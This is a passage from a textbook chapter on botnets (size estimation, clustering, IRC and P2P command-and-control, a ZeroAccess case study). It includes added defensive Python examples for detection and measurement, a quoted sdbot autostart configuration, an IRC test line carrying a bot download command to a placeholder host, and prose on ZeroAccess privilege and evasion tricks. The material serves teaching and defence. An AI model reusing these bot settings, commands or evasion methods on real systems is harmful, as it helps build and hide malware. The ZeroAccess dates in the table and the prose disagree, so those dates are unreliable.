of available DNS servers can be obtained by fast Internet-wide scanning (e.g., using
ZMap [28]). A cache hit on a DNS server indicates that at least one bot sent a query
to that server before the corresponding botnet entry expired. The number of cache
hits therefore serves as a lower bound on the number of bots.
■ Crawling P2P botnets: Botnet size estimation in P2P botnets is done mainly by
crawling the botnet recursively. Starting with one bot, a request is issued to get its
peer-list. A request is then issued for each IP address in that peer-list. This process
continues recursively until no additional IP addresses are observed. Crawling speed
is important because the structure of the P2P botnet graph changes frequently:
bots join and leave in an unpredictable way, and this happens while peer-list
requests are being sent and analyzed. Hence, crawling must be done very quickly to
obtain an accurate snapshot of the current P2P graph.
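As an added example (not code from the book or from the tools it cites), the Python below shows the mechanics behind DNS cache snooping: it builds the non-recursive query a probe sends (the recursion-desired bit is cleared, so a resolver answers only from its cache), parses the reply, and turns a set of replies into the lower-bound estimate described above. The resolver replies are constructed inline rather than captured, and the name cnc-domain.example is a placeholder, not a domain from the chapter.

```python
import struct

# Placeholder C&C name (constructed for this example).
CNC_NAME = "cnc-domain.example"


def encode_name(name):
    """Encode a dotted hostname into DNS label wire format."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def read_name(data, offset):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = data[offset]
        if (length & 0xC0) == 0xC0:  # compression pointer to an earlier name
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end


def build_query(name, txid=0x1234, recursion_desired=False):
    """A-record query. With RD cleared the resolver reports only what it has cached."""
    flags = 0x0100 if recursion_desired else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def build_response(query, answers):
    """Constructed resolver reply used as offline sample input.
    answers: list of (remaining_ttl, ipv4); an empty list models a cache miss."""
    txid, flags, _, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    flags |= 0x8000 | 0x0080  # QR=1 (response), RA=1 (recursion available)
    _, off = read_name(query, 12)
    question = query[12:off + 4]
    body = b""
    for ttl, ip in answers:
        rdata = bytes(int(o) for o in ip.split("."))
        # name pointer to offset 12 (the question name), TYPE A, CLASS IN, TTL, RDLENGTH
        body += struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, len(rdata)) + rdata
    header = struct.pack("!HHHHHH", txid, flags, 1, len(answers), 0, 0)
    return header + question + body


def parse_response(data):
    """Return the header fields and the (remaining TTL, IPv4) pairs in the answer section."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):          # skip the echoed question
        _, off = read_name(data, off)
        off += 4
    answers = []
    for _ in range(an):
        _, off = read_name(data, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((ttl, ".".join(str(b) for b in rdata)))
    return {"txid": txid, "rcode": flags & 0xF,
            "is_response": bool(flags & 0x8000), "answers": answers}


def is_cache_hit(resp):
    """A non-recursive query answered with records means the resolver had them cached."""
    return resp["is_response"] and resp["rcode"] == 0 and len(resp["answers"]) > 0


def seconds_since_cached(remaining_ttl, authoritative_ttl):
    """Upper bound on how long ago the resolver fetched the record, i.e. how long ago
    some bot behind it last had to resolve the name."""
    return max(0, authoritative_ttl - remaining_ttl)


def estimate_lower_bound(responses):
    """Every resolver holding the record was queried by at least one bot: a lower bound."""
    return sum(1 for r in responses if is_cache_hit(r))


QUERY = build_query(CNC_NAME)
# Constructed replies from three resolvers: two hits (different remaining TTLs), one miss.
SAMPLE_REPLIES = [
    build_response(QUERY, [(250, "192.0.2.10")]),
    build_response(QUERY, []),
    build_response(QUERY, [(30, "192.0.2.10")]),
]
```

A real probe would send QUERY over UDP port 53 to each resolver found by the scan and pass the returned datagrams to parse_response; the remaining TTL in a cached answer also brackets when the record was fetched, since the resolver obtained it at most authoritative TTL minus remaining TTL seconds earlier.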
1.2.2.2 Geographical Distribution of Botnets
Although bots can be found anywhere in the Internet, research studies show that they
are concentrated in particular regions of the world [26]. Several factors affect the
geographical distribution of botnets. One important factor is the underlying bot
infection propagation mechanism, which may be tied to a region or a language. Some
botnets attack applications written for a specific language or perform social
engineering in the language of a specific region [26].
The distribution of bots in the Internet is an important issue because it can assist in
developing efficient countermeasures [22,23,29]. This distribution is mainly influenced
by the distribution of vulnerable machines in the Internet. It is believed that vulnerable
machines tend to cluster in certain networks, which suggests that bots will cluster in
these networks as well, regardless of the method that botmasters follow in constructing
botnets. This is based on the observation that the population of vulnerable machines in
a given organizational network depends directly on the nature of the network security
policies enforced by the organization, and on the level of awareness of users regarding
hardening and protecting their own machines. For example, an organization that
enforces a strict security policy, deploys the latest technology to prevent security
breaches, and provides its employees with state-of-the-art virus scanners is expected to
have a very small number of vulnerable machines.
M. P. Collins et al. explain that botnets have the following two characteristics [22]:
■ Spatial uncleanliness: When there is a compromised host in a network, there is
a high chance of finding other hosts in the same network that are compromised and
perform hostile activities. This clustering of hostile activities within a network results
in an unclean network.
■ Temporal uncleanliness: If there is a compromised host in a network, then this host
or other hosts within the network are likely to be compromised again in the future.
Hence, the hosts in the network will undergo hostile activities over time.
The test for spatial uncleanliness was conducted by examining how IP addresses
cluster within different networks. It was found that, for networks of equal size,
compromised hosts are more likely to appear together in the same network than hosts
and addresses chosen at random from the Internet population. The test for temporal
uncleanliness, on the other hand, was conducted by examining unclean networks.
Networks that contain compromised hosts were found to predict future hostile
activities with higher accuracy than networks chosen at random.
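To make the two tests concrete, the following Python is an added example (not code from the book or from Collins et al.) that measures both properties on a list of compromised-host addresses: spatial uncleanliness as the share of hosts that share their network prefix with another compromised host, and temporal uncleanliness as the fraction of previously unclean networks that are unclean again in a later observation period. The host lists and the uniformly spread "random" comparison set are constructed inline; the /24 granularity is an assumption, and the prefix length is a parameter so the same test can be run at /16 or /8.

```python
import ipaddress
from collections import Counter

# Constructed observations (documentation and private ranges); not data from the chapter.
OBSERVED_WEEK1 = [
    "203.0.113.5", "203.0.113.17", "203.0.113.88",   # three hosts in one /24
    "198.51.100.2", "198.51.100.9",                   # two in another
    "192.0.2.44", "192.0.2.45", "192.0.2.200",        # three in a third
    "10.7.3.12", "172.16.9.3",                        # two isolated hosts
]
OBSERVED_WEEK2 = [
    "203.0.113.91", "198.51.100.60", "192.0.2.46", "192.0.2.47",
    "10.7.3.12", "172.16.77.1",
]
# Constructed baseline standing in for addresses drawn at random: one host per /24.
RANDOM_BASELINE = [
    "10.1.2.3", "10.55.6.7", "172.16.40.9", "172.31.2.2", "192.168.50.77",
    "10.200.1.130", "172.25.3.9", "10.99.0.1", "172.20.5.5", "192.168.3.3",
]


def network_of(ip, prefix=24):
    """Map a host address to its enclosing network, e.g. 203.0.113.5 -> 203.0.113.0/24."""
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def hosts_per_network(hosts, prefix=24):
    """Number of compromised hosts seen in each /prefix network."""
    return Counter(network_of(h, prefix) for h in hosts)


def spatial_uncleanliness(hosts, prefix=24):
    """Share of compromised hosts that have at least one other compromised host in the
    same /prefix. Close to 0 for a uniformly random sample; high when infections cluster."""
    counts = hosts_per_network(hosts, prefix)
    clustered = sum(n for n in counts.values() if n >= 2)
    return clustered / len(hosts) if hosts else 0.0


def temporal_uncleanliness(past_hosts, future_hosts, prefix=24):
    """Precision of 'unclean before, so unclean again': fraction of networks that held
    a compromised host in the past period and hold one again in the future period."""
    past = set(hosts_per_network(past_hosts, prefix))
    future = set(hosts_per_network(future_hosts, prefix))
    return len(past & future) / len(past) if past else 0.0


def uncleanliness_report(past, future, baseline, prefix=24):
    """Both metrics for the observed data, next to the same metrics for the baseline."""
    return {
        "spatial_observed": spatial_uncleanliness(past, prefix),
        "spatial_baseline": spatial_uncleanliness(baseline, prefix),
        "temporal_observed": temporal_uncleanliness(past, future, prefix),
        "temporal_baseline": temporal_uncleanliness(baseline, future, prefix),
    }


if __name__ == "__main__":
    for k, v in uncleanliness_report(OBSERVED_WEEK1, OBSERVED_WEEK2, RANDOM_BASELINE).items():
        print(f"{k}: {v:.2f}")
```

On real data the baseline should be drawn many times from the monitored address population and the observed value compared with the resulting distribution, since one random draw can land in a shared /24 by chance.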
1.2.2.3 Spatial-Temporal Correlation and Similarity
In addition to the spatial and temporal uncleanliness described above, botnets are
generally characterized by a spatial-temporal correlation that follows directly from
their inherent features. During a given time interval, bots within an organizational
network perform similar operations in response to commands issued by the botmaster.
Typically, these bots maintain long-lived connections with the C&C server and remain
on standby for commands. Two types of responses are observed when bots receive
commands from the botmaster:
■ Message response: Certain commands are used by the botmaster to obtain
information about the bot machine, such as the operating system version, CPU
architecture, bandwidth, and bot ID. Bots typically respond with short messages
that contain the requested information. Figure 1.3a shows an example of the message
responses of three bots within an organizational network.
■ Activity response: Other commands issued by the botmaster are associated with
specific activities such as scanning, denial of service attacks, and email spam.
Therefore, each bot generates a large amount of traffic of a certain type during the
same time interval. Figure 1.3b shows an example of the activity responses of three
bots within an organizational network to different commands sent by the botmaster.
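The correlation just described is what a network-side detector can look for: several internal hosts talking to the same destination, with similarly sized traffic, inside the same short window. The following Python is an added example (not code from the book or from [14]) that groups flow records by time window, destination and a coarse size class, reports every group with at least a threshold number of distinct internal hosts, and labels the group as a message-response or activity-response crowd by its typical byte volume. The flow records are constructed inline; the 60-second window, the three-host threshold and the 256-byte split between the two kinds are assumptions to be tuned per network.

```python
from collections import defaultdict
from statistics import median

# Constructed flow records (timestamp, src, dst, dst_port, bytes); not data from the chapter.
FLOWS = [
    (1000, "10.0.0.1", "198.51.100.7", 6667, 41),    # three bots answer a bot-ID query
    (1003, "10.0.0.2", "198.51.100.7", 6667, 44),
    (1005, "10.0.0.3", "198.51.100.7", 6667, 39),
    (1030, "10.0.0.9", "93.184.216.34", 443, 5200),  # ordinary web traffic
    (1200, "10.0.0.1", "203.0.113.50", 80, 900000),  # four bots flood one target
    (1201, "10.0.0.2", "203.0.113.50", 80, 880000),
    (1202, "10.0.0.3", "203.0.113.50", 80, 910000),
    (1210, "10.0.0.4", "203.0.113.50", 80, 870000),
    (1400, "10.0.0.5", "198.51.100.7", 6667, 40),    # one host alone: not a crowd
]

MESSAGE_BYTES_MAX = 256  # assumed split between short replies and bulk activity


def size_bucket(nbytes):
    """Coarse size class (bit length) so 39, 41 and 44 byte replies compare as similar."""
    return nbytes.bit_length()


def find_crowds(flows, window=60, min_hosts=3):
    """Return groups of >= min_hosts distinct internal hosts that sent similarly sized
    traffic to the same destination within one window; sorted by window start."""
    groups = defaultdict(list)
    for t, src, dst, dport, nbytes in flows:
        key = (t // window * window, dst, dport, size_bucket(nbytes))
        groups[key].append((src, nbytes))
    crowds = []
    for (start, dst, dport, _), members in sorted(groups.items()):
        hosts = {src for src, _ in members}
        if len(hosts) < min_hosts:
            continue
        typical = median(n for _, n in members)
        kind = "message response" if typical < MESSAGE_BYTES_MAX else "activity response"
        crowds.append({"window_start": start, "destination": (dst, dport),
                       "hosts": hosts, "kind": kind})
    return crowds


if __name__ == "__main__":
    for c in find_crowds(FLOWS):
        print(f"t={c['window_start']} {c['kind']} crowd of {len(c['hosts'])} hosts -> {c['destination']}")
```

The destination key is what ties a crowd to a C&C server or an attack target; in production the same grouping is usually run per organizational subnet, so that a campus-wide software update, which also produces synchronized traffic, can be whitelisted by destination.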
1.3 Centralized Botnets
Most of the botnets that appeared in the early botnet era (e.g., sdbot, agobot, GTbot)
adopted a centralized architecture. In this architecture, the botmaster maintains
a central server that communicates with the bots. The bots wait for commands from the
central server. In addition, newly compromised hosts (bots) connect to the server and
report their information. The server oversees the status of the bots and sends the
commands to be executed. This basic structure is shown in Figure 1.4.
In centralized botnets, the C&C channel can be implemented using different protocols
such as IRC (Internet Relay Chat), HTTP (Hypertext Transfer Protocol), and email.
Recently, an advanced technique based on the Session Description Protocol (SDP) was
proposed in [30] for implementing a botnet's C&C channel. The technique uses SDP to
construct a covert communication channel, which results in a stealthy and effective
method for controlling a botnet. The growing interest in SDP as part of the Session
Initiation Protocol (SIP) in VoIP networks requires the research community to develop
efficient detection and mitigation mechanisms, as described in [31].
Figure 1.3 Spatial-temporal correlation and similarity: (a) message response crowd
(e.g., bot ID replies) and (b) activity response crowd (e.g., SYN attack, port scanning),
each shown as the responses of three bots over time. Figure is adopted from [14].
1.3.1 Case Study: IRC-based Botnets
IRC-based botnets are one of the most popular types of centralized botnets and
appeared in the early stages of the botnet threat. There are several families of
IRC-based botnets, such as SDbot and Agobot. The release of the bot code to the public
allowed new variants of each family to appear within a short period of time. These
botnets share similar characteristics and were used for different types of attacks.
IRC-based botnets utilize the communication capability of the IRC protocol, which
allows point-to-point and point-to-multipoint communication. The protocol is scalable in
the sense that it enables a large number of hosts to transfer data. The availability,
flexibility, and modularity of the IRC protocol allow users to modify it and use it in
their own applications. Hence, botnet developers tend to use the IRC protocol to shorten
their development time while still having an efficient communication protocol. As shown
in Figure 1.5, the IRC-based botnet life cycle follows five steps, which are [1]:
1. Scanning for vulnerable hosts: Usually, the bot code is designed to search for
vulnerable hosts automatically. This makes it similar to Internet worms, which means
that worm scanning strategies can be adopted in the process of botnet formation.
Figure 1.4 Centralized botnet (botmaster, C&C server, and the botnet it controls).
2. Installing the bot code: The compromised machine downloads a binary image of the
bot code from an existing botnet member (a machine that joined the botnet earlier) or
from a malware server. A malware server is a dedicated machine that the botmaster
configures in advance for this purpose. Afterward, the downloaded binary (the bot) is
installed on the machine, and every time the machine is rebooted the bot starts
executing automatically. With today's sophisticated malware distribution techniques,
it is not necessary to follow steps 1 and 2 strictly in order to find and infect
vulnerable machines. There are several ways for a host to become infected with bot
malware. For example, Gaobot and its variants infect hosts through instant messengers,
file sharing, and various software vulnerabilities. In addition, some methods persuade
victims to click on a link or a file that results in the execution of malicious code
(e.g., clicking an email attachment).
3. Resolving the DNS name of the IRC server: Today's botnet developers rely on domain
names instead of IP addresses. Hence, a bot contacts DNS servers to resolve the domain
name and obtain the IP address of the IRC server. The domain names are hard-coded in
the bot's binary.
4. Joining the IRC server: After a bot resolves the IP address of the IRC server, it
establishes a session and joins the C&C channel of the server. This channel is also
defined in the bot's binary code. This process requires three types of authentication:
(i) The bot has to authenticate itself to the C&C server using a password or an
encryption key that is included in the bot's binary. This prevents infiltration of the
botnet by other systems or bots. (ii) The bot has to authenticate itself to the chat
channel of the IRC server. This prevents other users or bots from joining the channel;
users and security researchers try to join C&C channels to find the active members and
the commands that are issued. (iii) The botmaster has to authenticate itself to the bot
population using a password or an encryption key stored in the bot's binary, in order
to prevent other botmasters or researchers from controlling the botnet.
5. Receiving commands from the botmaster: Bots receive commands on the IRC channel
(through the channel's topic). The channel's topic specifies the commands that the bots
are to execute.
In terms of the botnet life cycle described in Section 1.2, steps 1 and 2 represent the
recruitment stage, steps 3 and 4 represent the C&C establishment stage, and step 5
represents the activity stage. To illustrate the operation of IRC-based botnets, consider
the configuration of the bot sdbotv5b, which is shown below. Bots are configured to
match the settings of the IRC server that has been set up in advance as the C&C server.
This includes the passwords used for authentication, the server name, the port number,
the chat channel name, and the other parameters indicated in the bot configuration
below.
// bot configuration
const char botid[] = "bot1"; // bot id
const char password[] = "password"; // bot password
const int maxlogins = 4; // maximum number of simultaneous logins
const char server[] = "ircserver"; // server
const int port = 7777; // server port
const char serverpass[] = ""; // server password
const char channel[] = "#nes554"; // channel that the bot should join
const char chanpass[] = ""; // channel password
const char server2[] = ""; // backup server (optional)
const int port2 = 6667; // backup server port
const char channel2[] = ""; // backup channel (optional)
const char chanpass2[] = ""; // backup channel password (optional)
const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands
const BOOL rndfilename = FALSE; // use random file name
const char filename[] = "nes554SDbot.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
const char prefix = '.'; // command prefix (one character max.)
const char version[] = "sdbot v0.5b by [sd]"; // bot's VERSION reply
const int cryptkey = 0; // encryption key (not used right now)
const int maxaliases = 16; // maximum number of aliases.
Figure 1.5 IRC-based botnet life cycle. Figure is adopted from [1].
Once the bot joins the C&C channel, it is ready to receive and execute commands. For
example, the botmaster may instruct the bot to perform a SYN flood attack against
a certain target, or to download a certain malicious file from the Internet.
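The configuration above gives a defender two concrete things to look for on a monitored IRC session: a channel topic that starts with the command prefix character, and a CTCP VERSION reply carrying the bot's version string. The following Python is an added example (not code from the book or from sdbot) that parses raw IRC protocol lines into prefix, command, parameters and trailing text, then flags both indicators. The log lines are constructed; the channel name and the "sdbot v0.5b by [sd]" string come from the configuration shown above, while the extra prefix characters and the download URL are assumptions.

```python
import re

# '.' is the prefix in the sdbot configuration above; the others are assumed variants.
COMMAND_PREFIXES = {".", "!", "$"}
# Substrings of CTCP VERSION replies worth alerting on (from the config's version[]).
BOT_VERSION_SIGNATURES = ("sdbot",)

# RFC 1459 message shape: [":" prefix SP] command [SP params] [SP ":" trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)(?P<params>(?: [^:\s]\S*)*)(?: :(?P<trailing>.*))?$"
)

# Constructed session log (not a real capture); #nes554 is the channel from the config above.
SAMPLE_LOG = [
    ":irc.example NOTICE AUTH :*** Looking up your hostname...",
    "JOIN #nes554",
    ":irc.example 332 bot1 #nes554 :.download http://placeholder.example/update.exe",
    ":bot1!u@10.0.0.7 NOTICE botmaster :\x01VERSION sdbot v0.5b by [sd]\x01",
    ":alice!a@example PRIVMSG #chat :just chatting .",
    ":admin!a@example TOPIC #chat :Welcome to #chat. Be nice",
]


def parse_irc(line):
    """Split one IRC line into its parts; returns None for lines that do not parse."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {"prefix": m.group("prefix"), "command": m.group("command").upper(),
            "params": m.group("params").split(), "trailing": m.group("trailing")}


def topic_command(msg):
    """Return the topic text if a TOPIC change, or the 332 topic sent on join,
    begins with a command prefix followed directly by a command word."""
    if msg["command"] not in ("TOPIC", "332") or not msg["trailing"]:
        return None
    text = msg["trailing"].strip()
    if len(text) > 1 and text[0] in COMMAND_PREFIXES and not text[1].isspace():
        return text
    return None


def version_signature(msg):
    """Return the matching family name if a CTCP VERSION reply carries a known bot string."""
    if msg["command"] != "NOTICE" or not msg["trailing"]:
        return None
    t = msg["trailing"]
    if t.startswith("\x01VERSION") and t.endswith("\x01"):
        body = t[len("\x01VERSION"):-1].strip().lower()
        for sig in BOT_VERSION_SIGNATURES:
            if sig in body:
                return sig
    return None


def scan_irc_log(lines):
    """Return (indicator, where, detail) tuples for every suspicious line."""
    alerts = []
    for line in lines:
        msg = parse_irc(line)
        if msg is None:
            continue
        cmd = topic_command(msg)
        if cmd:
            alerts.append(("topic-command", msg["params"][-1] if msg["params"] else None, cmd))
        sig = version_signature(msg)
        if sig:
            alerts.append(("bot-version-reply", msg["prefix"], sig))
    return alerts


if __name__ == "__main__":
    for alert in scan_irc_log(SAMPLE_LOG):
        print(alert)
```

The 332 numeric matters as much as TOPIC itself: a bot that joins after the topic was set never sees a TOPIC message, only the 332 reply, so a detector that watches TOPIC alone misses the commands delivered to most of the population.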
For better management, botmasters usually adopt a hierarchical structure rather than
the basic centralized structure. In a hierarchical topology, the botmaster controls
a set of machines called bot controllers, and each bot controller manages a set of
bots. Using multiple bot controllers makes the C&C channel more resilient. Centralized
botnets (both basic and hierarchical) are easier to create and manage. Moreover, they
respond to commands faster than the P2P structure. However, botmasters lose control
over the C&C channel once it is shut down by detection and isolation methods. In
addition, if the C&C server is hijacked, the botnet's structure and behavior are
exposed. Hence, some active monitoring techniques are employed to discover malicious
traffic and activities on public IRC servers [1,21,32].
1.4 P2P Botnets
The design of centralized botnets has the major drawback of a single point of failure.
Therefore, some attackers adopted P2P technology for C&C, where each bot communicates
with a subset of the other bots in the network [33–35]. The improvement of P2P
technology and the spread of P2P file sharing attracted botmasters to this technology
for constructing a new generation of botnets that inherit its robustness, scalability,
and resilience. Table 1.1 lists some of the most popular P2P botnets that appeared in
the wild and remained active for a long period of time.
P2P botnets are more complex than traditional centralized botnets. In this
architecture, bots reside on compromised machines within the botnet network and
communicate with each other rather than through a C&C server. Hence, the bots in the
network relay commands to each other. Each bot keeps a list of its neighbors; when it
receives a command from one of its neighbors, the bot forwards that command to the
other neighbors in the list. This results in a network that is called a zombie network.
Once a botmaster gains access to one host in the zombie network, the botmaster obtains
full control of the botnet. Each host in the P2P network acts as both a client and
a server, since there is no central point in this architecture.
P2P communication provides attackers with greater capabilities than the centralized
C&C architecture. In P2P botnets, if defenders are able to discover a subset of the
bots and isolate them, communication among the remaining bots is not disrupted. From
a botmaster's perspective, however, P2P botnets are more difficult to create and
manage, and it takes more time to propagate C&C messages to all botnet members. Hence,
botmasters prefer simple designs when developing P2P C&C channels. For example,
Phatbot stores the list of bots in Gnutella cache servers, which makes it possible to
discover the botnet by probing the cache servers. Sinit, on the other hand, uses random
probing to find bot members. In P2P botnets, if the IP address of a bot changes
(dynamic IP addresses), then the bot leaves the botnet network [32].
Typically, a P2P C&C channel is implemented using existing P2P file sharing
applications, such as Gnutella, Kazaa, and eMule, or using proprietary protocols. The
basic structure of a P2P botnet is shown in Figure 1.6.
Table 1.1 Popular P2P botnets

Botnet           Year            C&C                                                    Main activity
Nugache          January 2006    Based on custom protocol                               Theft of financial credentials via keystroke logging
Storm [37]       January 2007    Based on Overnet, a Kademlia implementation            Email spam and DDoS attacks via keystroke logging
Sality [38]      January 2008    Unstructured P2P network                               Stealthy scanning targeting critical voice communications infrastructure
Waledac [39]     December 2008   HTTP communication and a fast-flux based DNS network   Email spam
ZeroAccess v1    July 2009       Unstructured P2P architecture                          Bitcoin mining and click fraud
ZeroAccess v2    February 2012   Unstructured P2P architecture                          Bitcoin mining and click fraud
Kelihos v1 [40]  December 2010   Unstructured P2P botnet                                Email spam and ID theft
Miner [41]       August 2011     Unstructured P2P botnet                                Bitcoin mining
Zeus [42]        September 2011  Unstructured P2P botnet                                Steal credentials (particularly for financial institutions) from infected systems
P2P botnets can be represented as a graph in which the bots are the vertices and the
links between bots are the edges. For example, in Zeus each bot in the graph has
a peer-list [36]. Each bot knows a subset of the bots and maintains connections to
them. A bot issues a peer-list request when it starts to lose the connections in its
original list. A bot that receives a peer-list request shares its own peer-list with the
requesting bot, allowing that bot to expand its peer-list. However, in most P2P botnets
the architecture is not entirely P2P, as it includes a central server for bootstrapping
and obtaining initial peer-lists, as in Zeus [36]. In the following subsection, we
present the ZeroAccess botnet as a case study of P2P botnets.
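The peer-list exchange just described is exactly what the crawling technique from Section 1.2.2.1 exploits: ask one bot for its peer-list, then ask every address it returns, until nothing new appears. The following Python is an added example (not code from the book or from any real crawler) that implements that breadth-first crawl against an in-memory peer-list graph and shows the churn problem the earlier section warns about: when a bot goes offline part-way through a slow crawl, the bots only it knew about are never reached, and the count of responding bots (the online, connected portion that the adopted size definition counts) shrinks. The peer-lists use documentation address ranges and are constructed; the peer-list request itself is abstracted as a callable, since the real wire protocol is botnet-specific.

```python
from collections import deque

# Constructed peer-lists keyed by bot address; 203.0.113.9 is listed by a peer
# but never answers (e.g. behind NAT or offline).
PEER_LISTS = {
    "192.0.2.1": ["192.0.2.2", "192.0.2.3"],
    "192.0.2.2": ["192.0.2.1", "192.0.2.4", "198.51.100.1"],
    "192.0.2.3": ["192.0.2.1", "192.0.2.5"],
    "192.0.2.4": ["192.0.2.2"],
    "192.0.2.5": ["192.0.2.3", "203.0.113.9"],
    "198.51.100.1": ["192.0.2.2"],
}


def crawl(get_peers, seed, max_requests=10_000):
    """Breadth-first crawl from one known bot. get_peers(addr) returns that bot's
    peer-list, or None if it does not answer. Returns (responding bots,
    addresses seen but unreachable, number of requests made)."""
    seen, queue = {seed}, deque([seed])
    responding, unreachable = set(), set()
    requests = 0
    while queue and requests < max_requests:
        bot = queue.popleft()
        peers = get_peers(bot)
        requests += 1
        if peers is None:
            unreachable.add(bot)
            continue
        responding.add(bot)
        for p in peers:
            if p not in seen:       # each address is asked exactly once
                seen.add(p)
                queue.append(p)
    return responding, unreachable, requests


def static_network(peer_lists):
    """Peer-list lookup over a graph that does not change during the crawl."""
    return lambda addr: list(peer_lists[addr]) if addr in peer_lists else None


def churning_network(peer_lists, offline_after):
    """Peer-list lookup where bot X stops answering once offline_after[X] requests
    have already been made: models bots leaving while a slow crawl is in progress."""
    calls = [0]

    def get_peers(addr):
        n = calls[0]
        calls[0] += 1
        if addr not in peer_lists or n >= offline_after.get(addr, float("inf")):
            return None
        return list(peer_lists[addr])

    return get_peers


def size_estimate(get_peers, seed):
    """Largest connected portion reachable from the seed, i.e. the online bots."""
    responding, _, _ = crawl(get_peers, seed)
    return len(responding)


if __name__ == "__main__":
    fast = crawl(static_network(PEER_LISTS), "192.0.2.1")
    slow = crawl(churning_network(PEER_LISTS, {"192.0.2.5": 3}), "192.0.2.1")
    print("snapshot crawl: %d bots, unreachable %s, %d requests" % (len(fast[0]), fast[1], fast[2]))
    print("slow crawl:     %d bots, unreachable %s, %d requests" % (len(slow[0]), slow[1], slow[2]))
```

Because a single crawl is only a snapshot, practitioners typically repeat quick crawls and report the union of responding addresses over a short interval alongside the per-crawl counts, so that churn widens the reported range instead of silently lowering it.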
1.4.1 Case Study: ZeroAccess P2P Botnet
ZeroAccess (ZA) is a popular and complex P2P botnet. Two versions of the ZA malware
appeared, in September 2011 (ZAv1) and April 2012 (ZAv2), and between them they
infected millions of machines at that time [43]. ZA is considered a remarkable botnet
because of many features of its design and operation: its ability to infect both 32-bit
and 64-bit Windows machines, its ability to hide itself and persist on the infected
system, a P2P C&C structure in which nodes are labeled as "supernodes" or "regular
nodes," and the use of encryption and obfuscation to hide its communication patterns.
The ZA rootkit evolved over time, with new functionalities and features introduced in
later versions. In the following, we discuss the main steps of the ZA life cycle,
focusing on the techniques used for infection, installation, and C&C of the ZA malware.
Figure 1.6 Basic architecture of P2P botnets (botmaster and botnet).
1. Malware distribution: Two standard mechanisms were used to distribute the ZA
trojan. The first is exploit packs, which come as a collection of JavaScript code that
takes advantage of known vulnerabilities in applications such as Flash players, web
browsers, and PDF readers. The infection starts by compromising several legitimate
websites using attack methods such as SQL injection and stolen FTP credentials. The
attackers then insert malicious JavaScript into pages of these websites in order to
redirect their visitors to the mothership servers that host the original exploit pack.
Attackers trick users into visiting these websites using different techniques, such as
email spam campaigns whose messages contain links to the websites with attractive
content that increases the chance of the links being clicked. Attackers also use search
engine manipulation to make the compromised websites appear at the top of search
results. The second mechanism used to spread the ZA trojan is social engineering. This
technique aims to attract users to download and run a malicious executable. For
example, end users are commonly attracted to download popular games, pirated versions
of games, or any other attractive piece of software that is made available on websites
under the attacker's control.
2. Malware installation: ZA used the ZwQueryInformationProcess API to determine
whether the operating system is 32-bit or 64-bit and, based on that, chose the
appropriate installation mechanism. One of the installation requirements of the ZA
trojan is to obtain escalated privileges. To gain them, the malware has to overcome the
User Account Control (UAC) mechanism that Windows deploys to prevent unauthorized
access. This is achieved by bundling a legitimate payload (e.g., Adobe Flash Player)
with the malicious one as part of the software to be installed. This tricks the user into
granting the required privilege by accepting the warning messages shown for the
installation of the legitimate software. For example, the system may display a warning
asking the user to approve the installation of the legitimate software; by clicking OK,
the user indirectly gives the ZA trojan the privilege it needs to install itself.
3. Staying on the system: The ZA rootkit adopted several techniques to persist on the
infected system and remain hidden. One is a kernel manipulation technique: the ZA
rootkit creates a malicious copy of a kernel-mode driver and overwrites the original
driver by loading its own code into kernel space, which makes it difficult to
distinguish ZA from the legitimate driver. Another technique is to store malicious files
in a hidden volume in the file system, created specifically for this purpose in order to
avoid detection. Later versions of ZA adopted the technique of storing their encrypted
malicious files in a legitimate-looking Windows directory and restricting access to that
directory. The differences between the 32-bit and 64-bit versions were eliminated
gradually in subsequent versions of the ZA malware by moving away from kernel
components. In the most recent versions of ZA, the malware injects itself into common
Windows processes such as explorer.exe and services.exe. In addition, ZA disables
Windows security services such as Windows Firewall, the Windows Security Center, and
Windows Defender.
4. Command and control: After installation, the ZA malware connects back to a central
server whose IP address is hard-coded in the bot's binary. Through this connection, the
bot provides the server with information about the infected machine and its
configuration. It also authenticates itself to the server by presenting a randomly
generated domain name. This domain name corresponds to a nonexistent server and
changes from day to day, because the domain generation algorithm uses the current date
as the seed for generating the domain. Its purpose is to authenticate the bot: the
server checks that the presented domain name belongs to the expected set of domains,
which is built into the bot binary in advance. If the presented domain name is invalid,
the server aborts the connection. In this way the server ensures that only ZA bots
connect to it, which defeats botnet infiltration attempts. Each ZA malware instance is
shipped with an initial list of 256 IP addresses of infected machines, ordered by the
time they were last seen. The bot uses this initial contact list to join the ZA P2P
network by initiating connections to certain port numbers. Bots with public IP addresses
are labeled as supernodes, while bots that reside behind a NAT box are labeled as
regular nodes. For a node to be part of the P2P network, it must be reachable from the
outside.
5. Attack activity: Throughout its lifetime, ZA has been the source of different
malicious activities including spam, click fraud, and bitcoin mining. Bitcoin mining
represents a new type of botnet activity associated with the development of digital
currency. The idea is to leverage the collective computational power of the bot
machines to generate bitcoins for the botmaster's benefit.
1.5 Mobile Botnets
Modern mobile devices have attracted the attention of attackers because they provide
enough resources to launch large-scale attacks. Mobile devices today are powerful
platforms equipped with high computational power, large storage, Internet
connectivity, and a wide range of applications. In addition, technology is improving
